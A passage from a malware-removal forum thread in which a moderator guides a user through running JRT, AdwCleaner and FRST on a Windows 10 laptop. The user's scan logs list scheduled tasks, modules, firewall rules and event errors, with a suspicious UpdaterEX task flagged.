Task: {8B8AE3A2-57D8-4878-94C8-91CD171DC1B0} - System32\Tasks\Adobe Flash Player PPAPI Notifier => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_286_pepper.exe [2016-02-04] (Adobe Systems Incorporated)
Task: {B736EDDF-5008-4176-B799-5CFAB0C12C94} - System32\Tasks\YCMServiceAgent => C:\Program Files (x86)\CyberLink\YouCam6\YouCamService6.exe [2015-07-01] (CyberLink Corp.)
Task: {BB36727E-D5E4-4914-B0FF-8EF288AD33BD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe [2015-09-28] (Hewlett-Packard Company)
Task: {BCDFCA58-203D-4263-9162-150C79CDFCA3} - System32\Tasks\Avast SecureLine => C:\Program Files\AVAST Software\SecureLine\SecureLine.exe [2016-01-01] (AVAST Software)
Task: {D258A394-8AA0-46DF-9F09-613901AA4AAA} - System32\Tasks\Hewlett-Packard\HP CoolSense\HP CoolSense Start at Logon => C:\Program Files (x86)\Hewlett-Packard\HP CoolSense\CoolSense.exe [2015-05-21] (Hewlett-Packard Development Company, L.P.)
Task: {D37774FA-8902-4CDA-8A3C-89CC06539610} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Active Health Launcher => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPActiveHealth\ActiveHealth.exe [2016-01-20] (Hewlett-Packard)
Task: {E4C69028-920C-463A-8288-F4646F3ACBC8} - System32\Tasks\DropboxOEM => C:\Program Files (x86)\Dropbox\DropboxOEM\DropboxOEM.exe [2015-06-19] ()
Task: {E73353B5-CA09-4D8A-88FE-1B30EFF5BA32} - System32\Tasks\Microsoft\Office\OfficeTelemetryAgentLogOn2016 => C:\Program Files\Microsoft Office\root\Office16\msoia.exe [2016-01-19] (Microsoft Corporation)
Task: {FF03E025-7817-4F0C-957F-641451E6E937} - System32\Tasks\Hewlett-Packard\HP Support Assistant\First Boot => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF_Utils.exe [2015-09-28] (Hewlett-Packard Company)
 
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
 
Task: C:\WINDOWS\Tasks\Adobe Flash Player PPAPI Notifier.job => C:\WINDOWS\SysWOW64\Macromed\Flash\FlashUtil32_20_0_0_286_pepper.exe
Task: C:\WINDOWS\Tasks\CreateExplorerShellUnelevatedTask.job => C:\WINDOWS\explorer.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineCore.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\GoogleUpdateTaskMachineUA.job => C:\Program Files (x86)\Google\Update\GoogleUpdate.exe
Task: C:\WINDOWS\Tasks\HPCeeScheduleForJonathan.job => C:\Program Files (x86)\Hewlett-Packard\HP Ceement\HPCEE.exe
Task: C:\WINDOWS\Tasks\UpdaterEX.job => C:\Users\Jonathan\AppData\Roaming\UPDATE~1\UPDATE~1\UPDATE~1.EXE <==== ATTENTION
 
==================== Shortcuts =============================
 
(The entries could be listed to be restored or removed.)
 
ShortcutWithArgument: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Priceline.com.lnk -> C:\Program Files (x86)\Hewlett-Packard\Shared\WizLink.exe () -> hxxp://www.priceline.com/?refid=PLHBC6240OPQ&refclickid=square
 
==================== Loaded Modules (Whitelisted) ==============
 
2015-10-30 02:18 - 2015-10-30 02:18 - 00185856 _____ () C:\WINDOWS\SYSTEM32\ism32k.dll
2016-01-12 22:15 - 2016-01-17 14:46 - 00171712 _____ () C:\Program Files\Common Files\Microsoft Shared\ClickToRun\ApiClient.dll
2015-10-13 04:45 - 2015-10-13 04:45 - 00085800 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\zlib1.dll
2015-10-13 04:45 - 2015-10-13 04:45 - 01328912 _____ () C:\Program Files\Common Files\Apple\Apple Application Support\libxml2.dll
2016-01-01 14:06 - 2016-01-01 14:06 - 00452456 _____ () C:\Program Files\AVAST Software\SecureLine\VpnSvc.exe
2015-09-06 02:20 - 2014-04-14 20:59 - 00389896 _____ () C:\Program Files\CyberLink\Shared files\RichVideo64.exe
2015-12-08 10:47 - 2015-11-22 05:47 - 02653816 _____ () C:\WINDOWS\system32\CoreUIComponents.dll
2015-12-08 10:47 - 2015-11-22 05:47 - 02653816 _____ () C:\WINDOWS\System32\CoreUIComponents.dll
2016-01-31 09:22 - 2016-01-17 18:07 - 08913088 _____ () C:\Program Files\Microsoft Office\root\Office16\1033\GrooveIntlResource.dll
2016-01-21 18:23 - 2016-01-21 18:23 - 00144384 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeHost.exe
2015-12-21 20:52 - 2015-12-06 23:14 - 00093696 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\Windows.UI.Shell.SharedUtilities.dll
2015-12-21 20:52 - 2015-12-06 23:00 - 00472064 _____ () C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\QuickActions.dll
2016-01-15 05:03 - 2016-02-19 13:09 - 01277152 _____ () C:\Program Files (x86)\Common Files\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\updater.exe
2016-01-12 22:40 - 2016-01-04 20:29 - 07992832 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\CortanaApi.dll
2016-01-12 22:40 - 2016-01-04 20:23 - 00591360 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.Core.dll
2016-01-31 09:25 - 2016-01-16 00:10 - 02483200 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\Cortana.BackgroundTask.dll
2016-01-31 09:25 - 2016-01-16 00:13 - 04089856 _____ () C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\RemindersUI.dll
2016-02-04 17:19 - 2016-02-04 17:19 - 00015872 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.201.11370.0_x64__8wekyb3d8bbwe\Microsoft.Photos.exe
2016-02-04 17:19 - 2016-02-04 17:19 - 14869504 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.201.11370.0_x64__8wekyb3d8bbwe\Microsoft.Photos.dll
2015-11-19 18:42 - 2015-11-19 18:42 - 00258560 _____ () C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.201.11370.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll
2016-01-20 16:51 - 2016-01-20 16:51 - 03746816 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1601.49020.0_x64__8wekyb3d8bbwe\Calculator.exe
2015-12-15 09:35 - 2015-12-15 09:35 - 00258560 _____ () C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1601.49020.0_x64__8wekyb3d8bbwe\StoreRatingPromotion.dll
2016-01-15 05:51 - 2016-02-19 15:14 - 01418464 _____ () C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugincontainer.exe
2016-02-19 13:09 - 2016-02-19 13:09 - 00794336 _____ () C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\3\plugin.exe
2016-02-19 13:09 - 2016-02-19 13:09 - 00919264 _____ () C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\5\plugin.exe
2016-02-19 15:14 - 2016-02-19 15:14 - 00705760 _____ () C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\6\plugin.exe
2016-02-19 13:09 - 2016-02-19 13:09 - 00509152 _____ () C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\10\plugin.exe
2016-02-19 13:09 - 2016-02-19 13:09 - 01632992 _____ () C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\8\plugin.exe
2016-02-19 13:09 - 2016-02-19 13:09 - 00534752 _____ () C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\7\plugin.exe
2016-02-19 15:20 - 2016-02-19 15:20 - 01594080 _____ () C:\ProgramData\9a4b8b26-f4e0-4529-a5b4-93ec828f7e42\plugins\2\plugin.exe
2016-01-21 18:23 - 2016-01-21 18:23 - 00141312 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkypeBackgroundTasks.dll
2016-01-21 18:23 - 2016-01-21 18:23 - 22330368 _____ () C:\Program Files\WindowsApps\Microsoft.Messaging_2.13.20000.0_x86__8wekyb3d8bbwe\SkyWrap.dll
2016-01-15 10:15 - 2015-05-21 15:15 - 00883872 _____ () C:\Program Files\PDFConverter.com\PDF Converter Elite 4.0\platforms\qwindows.dll
2015-09-06 02:06 - 2015-04-29 19:04 - 38561984 _____ () C:\Program Files\AVAST Software\SecureLine\libcef.dll
2016-02-04 10:42 - 2016-02-04 10:42 - 62319736 _____ () C:\Program Files (x86)\Opera\35.0.2066.37\opera.dll
2016-02-04 10:42 - 2016-02-04 10:42 - 02074232 _____ () C:\Program Files (x86)\Opera\35.0.2066.37\libglesv2.dll
2016-02-04 10:42 - 2016-02-04 10:42 - 00081528 _____ () C:\Program Files (x86)\Opera\35.0.2066.37\libegl.dll
 
==================== Alternate Data Streams (Whitelisted) =========
 
(If an entry is included in the fixlist, only the ADS will be removed.)
 
 
==================== Safe Mode (Whitelisted) ===================
 
(If an entry is included in the fixlist, it will be removed from the registry. The "AlternateShell" will be restored.)
 
 
==================== EXE Association (Whitelisted) ===============
 
(If an entry is included in the fixlist, the registry item will be restored to default or removed.)
 
 
==================== Internet Explorer trusted/restricted ===============
 
(If an entry is included in the fixlist, it will be removed from the registry.)
 
 
==================== Hosts content: ===============================
 
(If needed Hosts: directive could be included in the fixlist to reset Hosts.)
 
2015-07-10 06:04 - 2015-07-10 06:02 - 00000824 ____A C:\WINDOWS\system32\Drivers\etc\hosts
 
 
==================== Other Areas ============================
 
(Currently there is no automatic fix for this section.)
 
HKU\S-1-5-21-2478984944-2039465796-333368353-1001\Control Panel\Desktop\\Wallpaper -> C:\Users\Jonathan\AppData\Local\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppBackground\{0348e5ad-d16b-4e8a-9ec2-517eb7ed8349}.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 5) (ConsentPromptBehaviorUser: 3) (EnableLUA: 1)
Windows Firewall is enabled.
 
==================== MSCONFIG/TASK MANAGER disabled items ==
 
(Currently there is no automatic fix for this section.)
 
 
==================== FirewallRules (Whitelisted) ===============
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
FirewallRules: [vm-monitoring-nb-session] => (Allow) LPort=139
FirewallRules: [{35A3A6F1-55C9-4548-B3A7-BF8A56E742AB}] => (Allow) C:\Program Files\iTunes\iTunes.exe
FirewallRules: [{582A204D-2DFD-486A-8D45-9ED311D4B83E}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{EC64CDB8-1E33-47A8-BA06-62E303E5DE14}] => (Allow) C:\Program Files (x86)\Bonjour\mDNSResponder.exe
FirewallRules: [{A6EBF37F-3DC6-4B1C-9739-CF85416F0A78}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{BDC54A86-37B5-414E-8842-85A2F63415A3}] => (Allow) C:\Program Files\Bonjour\mDNSResponder.exe
FirewallRules: [{7CC3ED8B-B61D-4AD2-A903-D45279451D61}] => (Allow) C:\Users\Jonathan\AppData\Local\Temp\nso4EC2.tmp\Installer-10005498.exe
FirewallRules: [{FF0DAC6D-27EC-4654-9CE1-999777489282}] => (Allow) C:\Users\Jonathan\AppData\Local\Temp\nso4EC2.tmp\Installer-10005498.exe
FirewallRules: [{2E505564-064F-4B73-8D04-3F911F8D157B}] => (Allow) c:\Program Files\CyberLink\PowerDirector12\PDR10.EXE
FirewallRules: [{F780D0C8-3EFA-49A7-92E1-E58E9AC0BC98}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVD Cinema\PowerDVDCinema.exe
FirewallRules: [{63606228-7F91-41CC-884B-2A5CC521CBED}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Movie\PowerDVDMovie.exe
FirewallRules: [{1242B9CA-740F-4A95-B11D-A9A3A84AA081}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD14Agent.exe
FirewallRules: [{67BAA940-B885-4DEA-9D53-939946C43A72}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\Kernel\DMS\CLMSServerPDVD14.exe
FirewallRules: [{39C06DBF-AADC-4572-989C-5B2080AA1498}] => (Allow) C:\Program Files (x86)\CyberLink\PowerDVD14\PowerDVD.exe
FirewallRules: [{894684C0-4F6A-4EEE-A17A-DA8876D701A3}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War\GameData\sweaw.exe
FirewallRules: [{88403454-753A-4B8F-8665-9E059295F793}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War\GameData\sweaw.exe
FirewallRules: [{7D5C406E-D558-4256-B443-4D79C4418A9A}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War Forces of Corruption\swfoc.exe
FirewallRules: [{2C593D07-25E6-463D-9B5D-0277125A40FD}] => (Allow) C:\Program Files (x86)\LucasArts\Star Wars Empire at War Forces of Corruption\swfoc.exe
FirewallRules: [{1343A9D1-9FEC-49E9-856C-350176CB0AD9}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\outlook.exe
FirewallRules: [{8DEC24A0-C242-47EF-8C87-77E3CDC9FB34}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{6F4FE454-D50F-4C3A-8A7E-F623137EF2C1}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\Lync.exe
FirewallRules: [{80E28F5C-830D-44DD-9D6A-8F05DBFC8A8E}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{7EFBC87D-EC25-4F92-BE76-83F380C8D360}] => (Allow) C:\Program Files\Microsoft Office\root\Office16\UcMapi.exe
FirewallRules: [{04BCE4F4-87F0-469C-A12E-CEB548ED0713}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
 
==================== Restore Points =========================
 
04-02-2016 19:45:11 Windows Update
11-02-2016 18:06:59 Windows Update
15-02-2016 17:56:09 Windows Update
19-02-2016 07:52:09 Windows Update
19-02-2016 11:24:44 Restore Operation
 
==================== Faulty Device Manager Devices =============
 
 
==================== Event log errors: =========================
 
Application errors:
==================
Error: (02/19/2016 01:18:33 PM) (Source: MsiInstaller) (EventID: 1024) (User: DESKTOP-FDU3B24)
Description: Product: Adobe Acrobat Reader DC - Update '{AC76BA86-7AD7-0000-2550-AC0F0A4E5B00}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft....k/?LinkId=23127
 
Error: (02/19/2016 01:03:15 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10600.147) TYPE: ERROR
 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
Executing Function:  PolicyBase::takeControlOfOsc
Message:  Failed to acquire OSC: Failure during execution of _OSC: 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
Executing Function:  EsifServices::primitiveExecuteSet
Message:  Error returned from ESIF services interface function call
Participant:  NoParticipant
Domain:  NoDomain
ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
ESIF Instance:  255
ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
 
 
Policy:  Critical Policy [0]
 
Error: (02/19/2016 12:54:07 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-FDU3B24)
Description: Activation of app Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (02/19/2016 12:50:05 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-FDU3B24)
Description: Activation of app Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (02/19/2016 12:45:49 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: DESKTOP-FDU3B24)
Description: Activation of app Microsoft.Getstarted_2.6.12.0_x64__8wekyb3d8bbwe:App.AppX7mv0s3r0wanj0n66dy6vax24ps6avzvz.mca failed with error: -2144927149 See the Microsoft-Windows-TWinUI/Operational log for additional information.
 
Error: (02/19/2016 12:43:24 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: PowerDVD14Agent.exe, version: 14.0.1.5418, time stamp: 0x55823d4f
Faulting module name: BoomerangLib.dll_unloaded, version: 3.0.0.3818, time stamp: 0x5302d454
Exception code: 0xc0000005
Fault offset: 0x00001000
Faulting process id: 0x1674
Faulting application start time: 0xPowerDVD14Agent.exe0
Faulting application path: PowerDVD14Agent.exe1
Faulting module path: PowerDVD14Agent.exe2
Report Id: PowerDVD14Agent.exe3
Faulting package full name: PowerDVD14Agent.exe4
Faulting package-relative application ID: PowerDVD14Agent.exe5
 
Error: (02/19/2016 12:41:48 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10600.147) TYPE: ERROR
 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
Executing Function:  PolicyBase::takeControlOfOsc
Message:  Failed to acquire OSC: Failure during execution of _OSC: 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
Executing Function:  EsifServices::primitiveExecuteSet
Message:  Error returned from ESIF services interface function call
Participant:  NoParticipant
Domain:  NoDomain
ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
ESIF Instance:  255
ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
 
 
Policy:  Critical Policy [0]
 
Error: (02/19/2016 12:35:03 PM) (Source: HP Active Health) (EventID: 88) (User: )
Description: -- SECURITY WARNING -- ActiveHealthProperties.ini has been tampered with, resetting it
 
Error: (02/19/2016 12:29:56 PM) (Source: DPTF) (EventID: 256) (User: )
Description: Intel® Dynamic Platform and Thermal Framework : ESIF(8.1.10600.147) TYPE: ERROR
 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\..\Sources\Policies\PolicyLib\PolicyBase.cpp @ line 673
Executing Function:  PolicyBase::takeControlOfOsc
Message:  Failed to acquire OSC: Failure during execution of _OSC: 
DPTF Build Version:  8.1.10600.147
DPTF Build Date:  May 26 2015 13:35:22
Source File:  ..\..\..\Sources\Manager\EsifServices.cpp @ line 473
Executing Function:  EsifServices::primitiveExecuteSet
Message:  Error returned from ESIF services interface function call
Participant:  NoParticipant
Domain:  NoDomain
ESIF Primitive:  SET_OPERATING_SYSTEM_CAPABILITIES [93]
ESIF Instance:  255
ESIF Return Code:  ESIF_E_UNSUPPORTED_ACTION_TYPE [1202]
 
 
Policy:  Critical Policy [0]
 
Error: (02/19/2016 12:04:55 PM) (Source: MsiInstaller) (EventID: 1024) (User: DESKTOP-FDU3B24)
Description: Product: Adobe Acrobat Reader DC - Update '{AC76BA86-7AD7-0000-2550-AC0F0A4E5B00}' could not be installed. Error code 1625. Windows Installer can create logs to help troubleshoot issues with installing software packages. Use the following link for instructions on turning on logging support: http://go.microsoft....k/?LinkId=23127
 
 
System errors:
=============
Error: (02/19/2016 01:02:35 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: 1084dpsUnavailable{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
 
Error: (02/19/2016 01:02:34 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: 1084dpsUnavailable{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
 
Error: (02/19/2016 01:02:34 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: 1084dpsUnavailable{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
 
Error: (02/19/2016 01:02:33 PM) (Source: DCOM) (EventID: 10016) (User: NT AUTHORITY)
Description: application-specificLocalActivation{D63B10C5-BB46-4990-A94F-E40B9D520160}{9CA88EE3-ACB7-47C8-AFC4-AB702511C276}NT AUTHORITYSYSTEMS-1-5-18LocalHost (Using LRPC)UnavailableUnavailable
 
Error: (02/19/2016 01:02:01 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-FDU3B24)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (02/19/2016 12:57:38 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-FDU3B24)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (02/19/2016 12:57:24 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-FDU3B24)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (02/19/2016 12:56:17 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-FDU3B24)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (02/19/2016 12:56:11 PM) (Source: DCOM) (EventID: 10005) (User: DESKTOP-FDU3B24)
Description: 1084ShellHWDetectionUnavailable{DD522ACC-F821-461A-A407-50B198B896DC}
 
Error: (02/19/2016 12:56:11 PM) (Source: DCOM) (EventID: 10005) (User: NT AUTHORITY)
Description: 1084dpsUnavailable{DDCFD26B-FEED-44CD-B71D-79487D2E5E5A}
 
 
CodeIntegrity:
===================================
  Date: 2016-02-19 15:33:41.399
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-19 15:33:41.361
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-19 11:55:09.063
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-17 20:16:45.183
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-17 20:16:45.173
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-17 20:13:24.379
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-17 20:13:24.366
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
  Date: 2016-02-17 08:18:57.765
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-13 15:36:45.944
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume3\Windows\System32\efswrt.dll because the set of per-page image hashes could not be found on the system.
 
  Date: 2016-02-12 11:35:48.588
  Description: Code Integrity determined that a process (\Device\HarddiskVolume3\Program Files\Windows Defender\MsMpEng.exe) attempted to load \Device\HarddiskVolume3\Program Files\Bonjour\mdnsNSP.dll that did not meet the Custom 3 / Antimalware signing level requirements.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i5-5200U CPU @ 2.20GHz
Percentage of memory in use: 41%
Total physical RAM: 6066.26 MB
Available physical RAM: 3572.84 MB
Total Virtual: 7026.26 MB
Available Virtual: 3915.64 MB
 
==================== Drives ================================
 
Drive c: (Windows) (Fixed) (Total:908.33 GB) (Free:824.91 GB) NTFS
Drive d: (RECOVERY) (Fixed) (Total:22 GB) (Free:2.55 GB) NTFS ==>[system with boot components (obtained from drive)]
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (Size: 931.5 GB) (Disk ID: 0E91C364)
 
Partition: GPT.
 
==================== End of Addition.txt ============================

Edited by JonKaz, 19 February 2016 - 02:44 PM.

  • 0

#3
LiquidTension

LiquidTension

    Instructor

  • GeekU Moderator
  • 1,068 posts

Hello JonKaz, welcome to Geeks to Go Malware Removal forum!
 
My username is LiquidTension, but you can call me Adam. I will be assisting you with your malware-related problems.
If you would allow me to call you by your first name I would prefer that. :)
 
======================================================
 
Please read through the points below to ensure this process moves as quickly and efficiently as possible.

  • Ensure you read through my instructions thoroughly, and carry out each step in the order specified.
  • Please do not run any tools or take any steps other than those I provide for you. Independent efforts may make matters worse, and will affect my ability in providing the best set of instructions for you.
  • Please backup important files before proceeding with my instructions. Malware removal can be unpredictable at times.   
  • If you come across any issues whilst following my instructions, please stop and inform me of the issue in as much detail as possible. Please do not hesitate to ask before proceeding.
  • Topics are locked if no response is made after 4 days. Please inform me if you require additional time to complete my instructions.
  • I will notify you when I believe your computer is free of malware. Please bear in mind, absence of symptoms does not necessarily correlate to absence of malware, so please wait until the "All Clean". 
  • Ensure you are following this topic. Click etYzdbu.png at the top of the page. 

======================================================
 
Please do the following:
 
STEP 1
E3feWj5.png Junkware Removal Tool (JRT)

  • Please download Junkware Removal Tool and save the file to your Desktop.
  • Temporarily disable your anti-virus software. For instructions, please refer to the following link.
  • Right-Click JRT.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts and allow the scan to run uninterrupted. 
  • Upon completion, a log (JRT.txt) will open on your desktop.
  • Re-enable your anti-virus software.
  • Copy the contents of JRT.txt and paste in your next reply.
     

STEP 2
BY4dvz9.png AdwCleaner

  • Please download AdwCleaner and save the file to your Desktop.
  • Right-Click AdwCleaner.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Follow the prompts. 
  • Click Scan
  • Upon completion, click Logfile. A log (AdwCleaner[S1].txt) will open. Briefly check the log for anything you know to be legitimate. 
  • Ensure anything you know to be legitimate does not have a checkmark under the corresponding tab, and click Cleaning
  • Follow the prompts and allow your computer to reboot
  • After the reboot, a log (AdwCleaner[C1].txt) will open. Copy the contents of the log and paste in your next reply.

-- File and folder backups are made for items removed using this tool. Should a legitimate file or folder be removed (otherwise known as a 'false-positive'), simple steps can be taken to restore the item. Please do not overly concern yourself with the contents of AdwCleaner[S1].txt.
 
 
STEP 3
xlK5Hdb.png Farbar Recovery Scan Tool (FRST) Scan

  • Right-Click FRST64.exe and select AVOiBNU.jpg Run as administrator to run the programme.
  • Ensure the Addition.txt box is checked.
  • Click the Scan button and let the programme run.
  • Upon completion, click OK, then OK on the Addition.txt pop up screen.
  • Two logs (FRST.txt & Addition.txt) will now be open on your Desktop. Copy the contents of both logs and paste in your next reply. 
     

======================================================

STEP 4
pfNZP4A.png Logs
In your next reply please include the following logs. Please be sure to copy and paste the requested logs, as well as provide information on any questions I may have asked.

  • JRT.txt
  • AdwCleaner[C1].txt
  • FRST.txt
  • Addition.txt

  • 0

#4
LiquidTension

LiquidTension

    Instructor

  • GeekU Moderator
  • 1,068 posts

Hello, 

 

Do you still require assistance? 


  • 0

#5
JonKaz

JonKaz

    New Member

  • Topic Starter
  • Member
  • Pip
  • 6 posts

Sorry for my late response - got busy with school - text files are below.

Thanks so much...Jonathan

 

 

JRT.txt

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Junkware Removal Tool (JRT) by Malwarebytes
Version: 8.0.3 (02.09.2016)
Operating System: Windows 10 Home x64 
Ran by Jonathan (Administrator) on Tue 02/23/2016 at 20:27:52.64
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 
 
 
 
File System: 4 
 
Successfully deleted: C:\Users\Jonathan\AppData\Roaming\nico mak computing (Folder) 
Successfully deleted: C:\users\Public\Documents\guid (Folder) 
